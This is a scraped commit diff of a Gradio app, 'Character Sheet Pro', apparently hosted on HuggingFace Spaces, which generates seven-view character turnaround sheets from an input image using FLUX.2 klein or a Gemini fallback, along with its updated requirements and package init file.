backend = BackendRouter.backend_from_string(backend_choice)
|
| 366 |
+
is_cloud = backend in (BackendType.GEMINI_FLASH, BackendType.GEMINI_PRO)
|
| 367 |
+
|
| 368 |
+
# Validate API key for cloud backends
|
| 369 |
+
if is_cloud and not api_key:
|
| 370 |
+
return None, "Error: Gemini API key required for cloud backends", {}
|
| 371 |
+
|
| 372 |
+
# Load or reuse service
|
| 373 |
+
if _cached_service is None or _cached_backend != backend:
|
| 374 |
+
logger.info(f"Loading model for {backend.value}...")
|
| 375 |
+
|
| 376 |
+
# For local FLUX model, create service (this loads the model)
|
| 377 |
+
_cached_service = CharacterSheetService(
|
| 378 |
+
api_key=api_key if is_cloud else None,
|
| 379 |
+
backend=backend
|
| 380 |
+
)
|
| 381 |
+
_cached_backend = backend
|
| 382 |
+
|
| 383 |
+
# Configure steps/guidance
|
| 384 |
+
if hasattr(_cached_service.client, 'default_steps'):
|
| 385 |
+
_cached_service.client.default_steps = num_steps
|
| 386 |
+
if hasattr(_cached_service.client, 'default_guidance'):
|
| 387 |
+
_cached_service.client.default_guidance = guidance_scale
|
| 388 |
+
|
| 389 |
+
logger.info(f"Model loaded successfully: {backend.value}")
|
| 390 |
+
|
| 391 |
+
# Map gender selection
|
| 392 |
+
gender_map = {
|
| 393 |
+
"Auto/Neutral": "character",
|
| 394 |
+
"Male": "man",
|
| 395 |
+
"Female": "woman"
|
| 396 |
+
}
|
| 397 |
+
gender_term = gender_map.get(gender, "character")
|
| 398 |
+
|
| 399 |
+
# Validate steps and guidance
|
| 400 |
+
num_steps = max(1, min(100, int(num_steps)))
|
| 401 |
+
guidance_scale = max(0.0, min(20.0, float(guidance_scale)))
|
| 402 |
+
|
| 403 |
+
# Update steps/guidance if different
|
| 404 |
+
if hasattr(_cached_service.client, 'default_steps'):
|
| 405 |
+
_cached_service.client.default_steps = num_steps
|
| 406 |
+
if hasattr(_cached_service.client, 'default_guidance'):
|
| 407 |
+
_cached_service.client.default_guidance = guidance_scale
|
| 408 |
+
|
| 409 |
+
# Run generation
|
| 410 |
+
logger.info(f"Starting generation for {character_name}...")
|
| 411 |
+
|
| 412 |
+
sheet, status, metadata = _cached_service.generate_character_sheet(
|
| 413 |
+
initial_image=input_image,
|
| 414 |
+
input_type=input_type,
|
| 415 |
+
character_name=character_name or "Character",
|
| 416 |
+
gender_term=gender_term,
|
| 417 |
+
costume_description=costume_description,
|
| 418 |
+
costume_image=costume_image,
|
| 419 |
+
face_image=face_image,
|
| 420 |
+
body_image=body_image,
|
| 421 |
+
include_costume_in_faces=include_costume_in_faces,
|
| 422 |
+
output_dir=OUTPUT_DIR
|
| 423 |
+
)
|
| 424 |
+
|
| 425 |
+
return sheet, status, metadata
|
| 426 |
+
|
| 427 |
+
except Exception as e:
|
| 428 |
+
logger.exception(f"Generation error: {e}")
|
| 429 |
+
return None, f"Error: {str(e)}", {}
|
| 430 |
+
|
| 431 |
+
|
| 432 |
+
# =============================================================================
|
| 433 |
+
# Gradio Interface Functions
|
| 434 |
+
# =============================================================================
|
| 435 |
+
|
| 436 |
+
def generate_character_sheet(
|
| 437 |
+
input_image: Optional[Image.Image],
|
| 438 |
+
input_type: str,
|
| 439 |
+
character_name: str,
|
| 440 |
+
gender: str,
|
| 441 |
+
costume_description: str,
|
| 442 |
+
costume_image: Optional[Image.Image],
|
| 443 |
+
face_image: Optional[Image.Image],
|
| 444 |
+
body_image: Optional[Image.Image],
|
| 445 |
+
backend_choice: str,
|
| 446 |
+
api_key_override: str,
|
| 447 |
+
num_steps: int,
|
| 448 |
+
guidance_scale: float,
|
| 449 |
+
include_costume_in_faces: bool,
|
| 450 |
+
progress=gr.Progress()
|
| 451 |
+
) -> Generator:
|
| 452 |
+
"""
|
| 453 |
+
Generate character sheet from input image(s).
|
| 454 |
+
|
| 455 |
+
This wrapper handles preprocessing and calls the GPU-wrapped function.
|
| 456 |
+
"""
|
| 457 |
+
# Initial empty state
|
| 458 |
+
empty_previews = [None] * 7
|
| 459 |
+
|
| 460 |
+
yield (None, "Initializing...", *empty_previews, None, None)
|
| 461 |
+
|
| 462 |
+
# Preprocess all input images to PNG format
|
| 463 |
+
input_image = ensure_png_image(input_image)
|
| 464 |
+
face_image = ensure_png_image(face_image)
|
| 465 |
+
body_image = ensure_png_image(body_image)
|
| 466 |
+
costume_image = ensure_png_image(costume_image)
|
| 467 |
+
|
| 468 |
+
# Validate input
|
| 469 |
+
if input_type == "Face + Body (Separate)":
|
| 470 |
+
if face_image is None or body_image is None:
|
| 471 |
+
yield (None, "Error: Both face and body images required for this mode.",
|
| 472 |
+
*empty_previews, None, None)
|
| 473 |
+
return
|
| 474 |
+
elif input_image is None:
|
| 475 |
+
yield (None, "Error: Please upload an input image.", *empty_previews, None, None)
|
| 476 |
+
return
|
| 477 |
+
|
| 478 |
+
# Get API key
|
| 479 |
+
api_key = api_key_override.strip() if api_key_override.strip() else API_KEY
|
| 480 |
+
|
| 481 |
+
# Show loading state
|
| 482 |
+
progress(0.1, desc="Allocating GPU...")
|
| 483 |
+
yield (None, "Allocating GPU and loading model (this may take 30-60 seconds on first run)...",
|
| 484 |
+
*empty_previews, None, None)
|
| 485 |
+
|
| 486 |
+
try:
|
| 487 |
+
# Call the GPU-wrapped function
|
| 488 |
+
character_sheet, status, metadata = generate_with_gpu(
|
| 489 |
+
input_image=input_image,
|
| 490 |
+
input_type=input_type,
|
| 491 |
+
character_name=character_name or "Character",
|
| 492 |
+
gender=gender,
|
| 493 |
+
costume_description=costume_description,
|
| 494 |
+
costume_image=costume_image,
|
| 495 |
+
face_image=face_image,
|
| 496 |
+
body_image=body_image,
|
| 497 |
+
backend_choice=backend_choice,
|
| 498 |
+
api_key=api_key,
|
| 499 |
+
num_steps=int(num_steps),
|
| 500 |
+
guidance_scale=float(guidance_scale),
|
| 501 |
+
include_costume_in_faces=include_costume_in_faces
|
| 502 |
+
)
|
| 503 |
+
|
| 504 |
+
if character_sheet is None:
|
| 505 |
+
yield (None, status, *empty_previews, None, None)
|
| 506 |
+
return
|
| 507 |
+
|
| 508 |
+
# Get stages from metadata for preview
|
| 509 |
+
stages = metadata.get('stages', {})
|
| 510 |
+
|
| 511 |
+
# Create preview list
|
| 512 |
+
preview_list = [
|
| 513 |
+
stages.get('left_face'),
|
| 514 |
+
stages.get('front_face'),
|
| 515 |
+
stages.get('right_face'),
|
| 516 |
+
stages.get('left_body'),
|
| 517 |
+
stages.get('front_body'),
|
| 518 |
+
stages.get('right_body'),
|
| 519 |
+
stages.get('back_body')
|
| 520 |
+
]
|
| 521 |
+
|
| 522 |
+
# Determine backend
|
| 523 |
+
backend = BackendRouter.backend_from_string(backend_choice)
|
| 524 |
+
|
| 525 |
+
# Create metadata JSON
|
| 526 |
+
config = CharacterSheetConfig()
|
| 527 |
+
json_metadata = create_character_sheet_metadata(
|
| 528 |
+
character_name=character_name or "Character",
|
| 529 |
+
character_sheet=character_sheet,
|
| 530 |
+
stages=stages,
|
| 531 |
+
config=config,
|
| 532 |
+
backend=BackendRouter.BACKEND_NAMES.get(backend, backend_choice),
|
| 533 |
+
input_type=input_type,
|
| 534 |
+
costume_description=costume_description,
|
| 535 |
+
steps=num_steps,
|
| 536 |
+
guidance=guidance_scale
|
| 537 |
+
)
|
| 538 |
+
|
| 539 |
+
# Save JSON file
|
| 540 |
+
safe_name = sanitize_filename(character_name or "Character")
|
| 541 |
+
timestamp = datetime.now().strftime("%Y%m%d_%H%M%S")
|
| 542 |
+
json_path = OUTPUT_DIR / f"{safe_name}_{timestamp}_metadata.json"
|
| 543 |
+
with open(json_path, 'w') as f:
|
| 544 |
+
json.dump(json_metadata, f, indent=2)
|
| 545 |
+
|
| 546 |
+
# Create ZIP file
|
| 547 |
+
zip_path = create_download_zip(
|
| 548 |
+
character_name=character_name or "Character",
|
| 549 |
+
character_sheet=character_sheet,
|
| 550 |
+
stages=stages,
|
| 551 |
+
metadata=json_metadata,
|
| 552 |
+
output_dir=OUTPUT_DIR
|
| 553 |
+
)
|
| 554 |
+
|
| 555 |
+
# Final yield with all outputs
|
| 556 |
+
yield (
|
| 557 |
+
character_sheet,
|
| 558 |
+
status,
|
| 559 |
+
*preview_list,
|
| 560 |
+
str(json_path),
|
| 561 |
+
str(zip_path)
|
| 562 |
+
)
|
| 563 |
+
|
| 564 |
+
except Exception as e:
|
| 565 |
+
logger.exception(f"Error: {e}")
|
| 566 |
+
yield (None, f"Error: {str(e)}", *empty_previews, None, None)
|
| 567 |
+
|
| 568 |
+
|
| 569 |
+
def update_input_visibility(input_type: str):
|
| 570 |
+
"""Update visibility of input components based on input type."""
|
| 571 |
+
if input_type == "Face + Body (Separate)":
|
| 572 |
+
return (
|
| 573 |
+
gr.update(visible=False), # Main input
|
| 574 |
+
gr.update(visible=True), # Face input
|
| 575 |
+
gr.update(visible=True), # Body input
|
| 576 |
+
)
|
| 577 |
+
else:
|
| 578 |
+
return (
|
| 579 |
+
gr.update(visible=True), # Main input
|
| 580 |
+
gr.update(visible=False), # Face input
|
| 581 |
+
gr.update(visible=False), # Body input
|
| 582 |
+
)
|
| 583 |
+
|
| 584 |
+
|
| 585 |
+
def update_defaults_on_backend_change(backend_value: str):
|
| 586 |
+
"""Update steps, guidance, and costume-in-faces when backend changes."""
|
| 587 |
+
steps, guidance = get_model_defaults(backend_value)
|
| 588 |
+
costume_in_faces = get_costume_in_faces_default(backend_value)
|
| 589 |
+
return gr.update(value=steps), gr.update(value=guidance), gr.update(value=costume_in_faces)
|
| 590 |
+
|
| 591 |
+
|
| 592 |
+
# =============================================================================
|
| 593 |
+
# Gradio UI
|
| 594 |
+
# =============================================================================
|
| 595 |
+
|
| 596 |
+
# CSS for the interface
|
| 597 |
+
APP_CSS = """
|
| 598 |
+
.container { max-width: 1200px; margin: auto; }
|
| 599 |
+
.output-image { min-height: 400px; }
|
| 600 |
+
|
| 601 |
+
/* GPU status banner */
|
| 602 |
+
.gpu-banner {
|
| 603 |
+
background: linear-gradient(90deg, #7c3aed, #a855f7);
|
| 604 |
+
padding: 12px 20px;
|
| 605 |
+
text-align: center;
|
| 606 |
+
color: white;
|
| 607 |
+
font-weight: bold;
|
| 608 |
+
border-radius: 8px;
|
| 609 |
+
margin-bottom: 16px;
|
| 610 |
+
}
|
| 611 |
+
|
| 612 |
+
/* Generate button styling */
|
| 613 |
+
.generate-btn-main {
|
| 614 |
+
background: linear-gradient(90deg, #00aa44, #00cc55) !important;
|
| 615 |
+
color: white !important;
|
| 616 |
+
font-weight: bold !important;
|
| 617 |
+
font-size: 20px !important;
|
| 618 |
+
padding: 16px 32px !important;
|
| 619 |
+
border: none !important;
|
| 620 |
+
box-shadow: 0 4px 15px rgba(0, 170, 68, 0.4) !important;
|
| 621 |
+
}
|
| 622 |
+
|
| 623 |
+
.generate-btn-main:hover {
|
| 624 |
+
background: linear-gradient(90deg, #00cc55, #00ee66) !important;
|
| 625 |
}
|
| 626 |
"""
|
| 627 |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 628 |
|
| 629 |
+
def create_ui():
|
| 630 |
+
"""Create the Gradio interface for HuggingFace Spaces."""
|
| 631 |
+
|
| 632 |
+
with gr.Blocks(title="Character Sheet Pro") as demo:
|
| 633 |
+
|
| 634 |
+
# GPU status banner
|
| 635 |
+
gr.HTML(
|
| 636 |
+
'<div class="gpu-banner">'
|
| 637 |
+
'Zero GPU (A10G) - Model loads automatically on first generation'
|
| 638 |
+
'</div>'
|
| 639 |
+
)
|
| 640 |
+
|
| 641 |
+
gr.Markdown("# Character Sheet Pro")
|
| 642 |
+
gr.Markdown("Generate 7-view character turnaround sheets from a single input image using FLUX.2 klein.")
|
| 643 |
+
|
| 644 |
+
# Backend selection and controls
|
| 645 |
with gr.Row():
|
| 646 |
+
backend_dropdown = gr.Dropdown(
|
| 647 |
+
choices=[
|
| 648 |
+
("FLUX.2 klein 9B (Best Quality, ~20GB)", "flux_klein_9b_fp8"),
|
| 649 |
+
("FLUX.2 klein 4B (Fast, ~13GB)", BackendType.FLUX_KLEIN.value),
|
| 650 |
+
("Gemini Flash (Cloud - Fallback)", BackendType.GEMINI_FLASH.value),
|
| 651 |
+
],
|
| 652 |
+
value="flux_klein_9b_fp8", # Default to best quality
|
| 653 |
+
label="Backend",
|
| 654 |
+
scale=2
|
| 655 |
)
|
|
|
|
|
|
|
|
|
|
| 656 |
|
| 657 |
+
api_key_input = gr.Textbox(
|
| 658 |
+
label="Gemini API Key (for cloud backend)",
|
| 659 |
+
placeholder="Enter API key if using Gemini",
|
| 660 |
+
type="password",
|
| 661 |
+
value="",
|
| 662 |
+
scale=2
|
|
|
|
| 663 |
)
|
| 664 |
+
|
| 665 |
+
with gr.Row():
|
| 666 |
+
# Left column: Inputs
|
| 667 |
+
with gr.Column(scale=1):
|
| 668 |
+
gr.Markdown("### Input Settings")
|
| 669 |
+
|
| 670 |
+
input_type = gr.Radio(
|
| 671 |
+
choices=["Face Only", "Full Body", "Face + Body (Separate)"],
|
| 672 |
+
value="Face Only",
|
| 673 |
+
label="Input Type",
|
| 674 |
+
info="What type of image(s) are you providing?"
|
| 675 |
+
)
|
| 676 |
+
|
| 677 |
+
main_input = gr.Image(
|
| 678 |
+
label="Input Image",
|
| 679 |
+
type="pil",
|
| 680 |
+
format="png",
|
| 681 |
+
visible=True
|
| 682 |
+
)
|
| 683 |
+
|
| 684 |
+
with gr.Row(visible=False) as face_body_row:
|
| 685 |
+
face_input = gr.Image(
|
| 686 |
+
label="Face Reference",
|
| 687 |
+
type="pil",
|
| 688 |
+
format="png",
|
| 689 |
+
visible=False
|
| 690 |
+
)
|
| 691 |
+
body_input = gr.Image(
|
| 692 |
+
label="Body Reference",
|
| 693 |
+
type="pil",
|
| 694 |
+
format="png",
|
| 695 |
+
visible=False
|
| 696 |
+
)
|
| 697 |
+
|
| 698 |
+
gr.Markdown("### Character Details")
|
| 699 |
+
|
| 700 |
+
character_name = gr.Textbox(
|
| 701 |
+
label="Character Name",
|
| 702 |
+
placeholder="My Character",
|
| 703 |
+
value=""
|
| 704 |
+
)
|
| 705 |
+
|
| 706 |
+
gender = gr.Radio(
|
| 707 |
+
choices=["Auto/Neutral", "Male", "Female"],
|
| 708 |
+
value="Auto/Neutral",
|
| 709 |
+
label="Gender"
|
| 710 |
+
)
|
| 711 |
+
|
| 712 |
+
costume_description = gr.Textbox(
|
| 713 |
+
label="Costume Description (Optional)",
|
| 714 |
+
placeholder="e.g., Full plate armor with gold trim...",
|
| 715 |
+
value="",
|
| 716 |
+
lines=3
|
| 717 |
)
|
| 718 |
+
|
| 719 |
+
costume_image = gr.Image(
|
| 720 |
+
label="Costume Reference Image (Optional)",
|
| 721 |
+
type="pil",
|
| 722 |
+
format="png"
|
| 723 |
+
)
|
| 724 |
+
|
| 725 |
+
gr.Markdown("### Generation Parameters")
|
| 726 |
+
|
| 727 |
+
with gr.Row():
|
| 728 |
+
num_steps = gr.Number(
|
| 729 |
+
label="Inference Steps",
|
| 730 |
+
value=4,
|
| 731 |
+
minimum=1,
|
| 732 |
+
maximum=50,
|
| 733 |
+
step=1,
|
| 734 |
+
info="FLUX klein uses 4 steps"
|
| 735 |
+
)
|
| 736 |
+
guidance_scale = gr.Number(
|
| 737 |
+
label="Guidance Scale",
|
| 738 |
+
value=1.0,
|
| 739 |
+
minimum=0.0,
|
| 740 |
+
maximum=10.0,
|
| 741 |
+
step=0.1,
|
| 742 |
+
info="FLUX klein uses 1.0"
|
| 743 |
+
)
|
| 744 |
+
|
| 745 |
+
include_costume_in_faces = gr.Checkbox(
|
| 746 |
+
label="Include costume in face views",
|
| 747 |
+
value=False,
|
| 748 |
+
info="Turn OFF for FLUX (can confuse framing)"
|
| 749 |
)
|
| 750 |
|
| 751 |
+
# GENERATE BUTTON
|
| 752 |
+
generate_btn = gr.Button(
|
| 753 |
+
"GENERATE CHARACTER SHEET",
|
| 754 |
+
variant="primary",
|
| 755 |
+
size="lg",
|
| 756 |
+
elem_classes=["generate-btn-main"]
|
|
|
|
| 757 |
)
|
| 758 |
|
| 759 |
+
# Right column: Output
|
| 760 |
+
with gr.Column(scale=2):
|
| 761 |
+
gr.Markdown("### Generated Character Sheet")
|
| 762 |
+
|
| 763 |
+
output_image = gr.Image(
|
| 764 |
+
label="Character Sheet",
|
| 765 |
+
type="pil",
|
| 766 |
+
format="png",
|
| 767 |
+
elem_classes=["output-image"]
|
| 768 |
+
)
|
| 769 |
+
|
| 770 |
+
status_text = gr.Textbox(
|
| 771 |
+
label="Status",
|
| 772 |
+
interactive=False
|
| 773 |
+
)
|
| 774 |
+
|
| 775 |
+
# Preview gallery
|
| 776 |
+
gr.Markdown("### Individual Views Preview")
|
| 777 |
+
|
| 778 |
+
with gr.Row():
|
| 779 |
+
gr.Markdown("**Face Views:**")
|
| 780 |
+
with gr.Row():
|
| 781 |
+
preview_left_face = gr.Image(label="Left Face", type="pil", height=150, width=112)
|
| 782 |
+
preview_front_face = gr.Image(label="Front Face", type="pil", height=150, width=112)
|
| 783 |
+
preview_right_face = gr.Image(label="Right Face", type="pil", height=150, width=112)
|
| 784 |
+
|
| 785 |
+
with gr.Row():
|
| 786 |
+
gr.Markdown("**Body Views:**")
|
| 787 |
+
with gr.Row():
|
| 788 |
+
preview_left_body = gr.Image(label="Left Body", type="pil", height=150, width=84)
|
| 789 |
+
preview_front_body = gr.Image(label="Front Body", type="pil", height=150, width=84)
|
| 790 |
+
preview_right_body = gr.Image(label="Right Body", type="pil", height=150, width=84)
|
| 791 |
+
preview_back_body = gr.Image(label="Back Body", type="pil", height=150, width=84)
|
| 792 |
+
|
| 793 |
+
# Downloads
|
| 794 |
+
gr.Markdown("### Downloads")
|
| 795 |
+
with gr.Row():
|
| 796 |
+
json_download = gr.File(label="Metadata JSON", interactive=False)
|
| 797 |
+
zip_download = gr.File(label="Complete Package (ZIP)", interactive=False)
|
| 798 |
+
|
| 799 |
+
# Usage instructions
|
| 800 |
+
gr.Markdown("---")
|
| 801 |
+
gr.Markdown("### How to Use")
|
| 802 |
+
gr.Markdown("""
|
| 803 |
+
1. **Upload an image** (face portrait or full body)
|
| 804 |
+
2. **Select input type** based on your image
|
| 805 |
+
3. **Optionally** add character name, gender, and costume description
|
| 806 |
+
4. **Click Generate** - the model loads automatically on first run (~30-60s)
|
| 807 |
+
5. **Wait** for all 7 views to generate (~2-3 minutes total)
|
| 808 |
+
6. **Download** the complete package
|
| 809 |
+
|
| 810 |
+
**GPU Notes:**
|
| 811 |
+
- Uses Zero GPU (A10G 24GB) - free but with 5-minute session limit
|
| 812 |
+
- First generation loads the model (adds ~30-60 seconds)
|
| 813 |
+
- Subsequent generations in the same session are faster
|
| 814 |
+
- If GPU unavailable, switch to Gemini Flash (requires API key)
|
| 815 |
+
""")
|
| 816 |
+
|
| 817 |
+
# Event handlers
|
| 818 |
+
input_type.change(
|
| 819 |
+
fn=update_input_visibility,
|
| 820 |
+
inputs=[input_type],
|
| 821 |
+
outputs=[main_input, face_input, body_input]
|
| 822 |
+
)
|
| 823 |
+
|
| 824 |
+
backend_dropdown.change(
|
| 825 |
+
fn=update_defaults_on_backend_change,
|
| 826 |
+
inputs=[backend_dropdown],
|
| 827 |
+
outputs=[num_steps, guidance_scale, include_costume_in_faces]
|
| 828 |
)
|
| 829 |
|
| 830 |
+
generate_btn.click(
|
| 831 |
+
fn=generate_character_sheet,
|
| 832 |
+
inputs=[
|
| 833 |
+
main_input,
|
| 834 |
+
input_type,
|
| 835 |
+
character_name,
|
| 836 |
+
gender,
|
| 837 |
+
costume_description,
|
| 838 |
+
costume_image,
|
| 839 |
+
face_input,
|
| 840 |
+
body_input,
|
| 841 |
+
backend_dropdown,
|
| 842 |
+
api_key_input,
|
| 843 |
+
num_steps,
|
| 844 |
+
guidance_scale,
|
| 845 |
+
include_costume_in_faces
|
| 846 |
+
],
|
| 847 |
+
outputs=[
|
| 848 |
+
output_image,
|
| 849 |
+
status_text,
|
| 850 |
+
preview_left_face,
|
| 851 |
+
preview_front_face,
|
| 852 |
+
preview_right_face,
|
| 853 |
+
preview_left_body,
|
| 854 |
+
preview_front_body,
|
| 855 |
+
preview_right_body,
|
| 856 |
+
preview_back_body,
|
| 857 |
+
json_download,
|
| 858 |
+
zip_download
|
| 859 |
+
]
|
| 860 |
)
|
| 861 |
|
| 862 |
+
return demo
|
| 863 |
+
|
| 864 |
+
|
| 865 |
+
# =============================================================================
|
| 866 |
+
# Main
|
| 867 |
+
# =============================================================================
|
| 868 |
+
|
| 869 |
+
if __name__ == "__main__":
|
| 870 |
+
demo = create_ui()
|
| 871 |
+
|
| 872 |
+
if HF_SPACES:
|
| 873 |
+
# Running on HuggingFace Spaces
|
| 874 |
+
demo.launch(
|
| 875 |
+
theme=gr.themes.Soft(),
|
| 876 |
+
css=APP_CSS
|
| 877 |
+
)
|
| 878 |
+
else:
|
| 879 |
+
# Local testing
|
| 880 |
+
print("Running locally (no Zero GPU)")
|
| 881 |
+
demo.launch(
|
| 882 |
+
server_name="0.0.0.0",
|
| 883 |
+
server_port=7890,
|
| 884 |
+
share=False,
|
| 885 |
+
theme=gr.themes.Soft(),
|
| 886 |
+
css=APP_CSS
|
| 887 |
+
)
|
requirements.txt
CHANGED
|
@@ -1,8 +1,36 @@
|
|
| 1 |
-
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 2 |
git+https://github.com/huggingface/diffusers.git
|
| 3 |
-
|
| 4 |
-
|
| 5 |
-
|
| 6 |
-
|
| 7 |
-
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 8 |
invisible_watermark
|
|
|
|
| 1 |
+
# Character Sheet Pro - HuggingFace Spaces
|
| 2 |
+
# =========================================
|
| 3 |
+
|
| 4 |
+
# Image processing
|
| 5 |
+
Pillow>=10.0.0
|
| 6 |
+
|
| 7 |
+
# Utilities
|
| 8 |
+
python-dotenv>=1.0.0
|
| 9 |
+
|
| 10 |
+
# Diffusers from git (required for Flux2KleinPipeline)
|
| 11 |
git+https://github.com/huggingface/diffusers.git
|
| 12 |
+
|
| 13 |
+
# PyTorch
|
| 14 |
+
torch>=2.1.0
|
| 15 |
+
torchvision>=0.16.0
|
| 16 |
+
|
| 17 |
+
# Transformers
|
| 18 |
+
transformers>=4.40.0
|
| 19 |
+
|
| 20 |
+
# Accelerate
|
| 21 |
+
accelerate>=0.25.0
|
| 22 |
+
|
| 23 |
+
# HuggingFace Hub
|
| 24 |
+
huggingface-hub>=0.20.0
|
| 25 |
+
|
| 26 |
+
# Safetensors
|
| 27 |
+
safetensors>=0.4.0
|
| 28 |
+
|
| 29 |
+
# Sentencepiece
|
| 30 |
+
sentencepiece>=0.1.99
|
| 31 |
+
|
| 32 |
+
# Google Gemini API (fallback backend)
|
| 33 |
+
google-genai>=0.3.0
|
| 34 |
+
|
| 35 |
+
# Invisible watermark (for FLUX)
|
| 36 |
invisible_watermark
|
src/__init__.py
ADDED
|
@@ -0,0 +1,37 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
"""
|
| 2 |
+
Character Sheet Pro - 7-View Character Sheet Generator
|
| 3 |
+
======================================================
|
| 4 |
+
|
| 5 |
+
A standalone character sheet generation system that creates
|
| 6 |
+
multi-view turnaround sheets from a single input image.
|
| 7 |
+
|
| 8 |
+
Supports:
|
| 9 |
+
- 7 views (3 face + 4 body)
|
| 10 |
+
- Multiple backends: Gemini (Cloud), FLUX.2 klein (Local), Qwen-Image-Edit (Local/ComfyUI)
|
| 11 |
+
- HuggingFace Spaces deployment via Gradio
|
| 12 |
+
"""
|
| 13 |
+
|
| 14 |
+
from .models import GenerationRequest, GenerationResult
|
| 15 |
+
from .gemini_client import GeminiClient
|
| 16 |
+
from .character_service import CharacterSheetService
|
| 17 |
+
from .backend_router import BackendRouter, BackendType
|
| 18 |
+
from .flux_klein_client import FluxKleinClient
|
| 19 |
+
from .qwen_image_edit_client import QwenImageEditClient
|
| 20 |
+
from .comfyui_client import ComfyUIClient
|
| 21 |
+
from .model_manager import ModelManager, ModelState, get_model_manager
|
| 22 |
+
|
| 23 |
+
__version__ = "2.3.0" # Bumped for model manager feature
|
| 24 |
+
__all__ = [
|
| 25 |
+
"GenerationRequest",
|
| 26 |
+
"GenerationResult",
|
| 27 |
+
"GeminiClient",
|
| 28 |
+
"CharacterSheetService",
|
| 29 |
+
"BackendRouter",
|
| 30 |
+
"BackendType",
|
| 31 |
+
"FluxKleinClient",
|
| 32 |
+
"QwenImageEditClient",
|
| 33 |
+
"ComfyUIClient",
|
| 34 |
+
"ModelManager",
|
| 35 |
+
"ModelState",
|
| 36 |
+
"get_model_manager",
|
| 37 |
+
]
|
src/backend_router.py
ADDED
|
@@ -0,0 +1,401 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
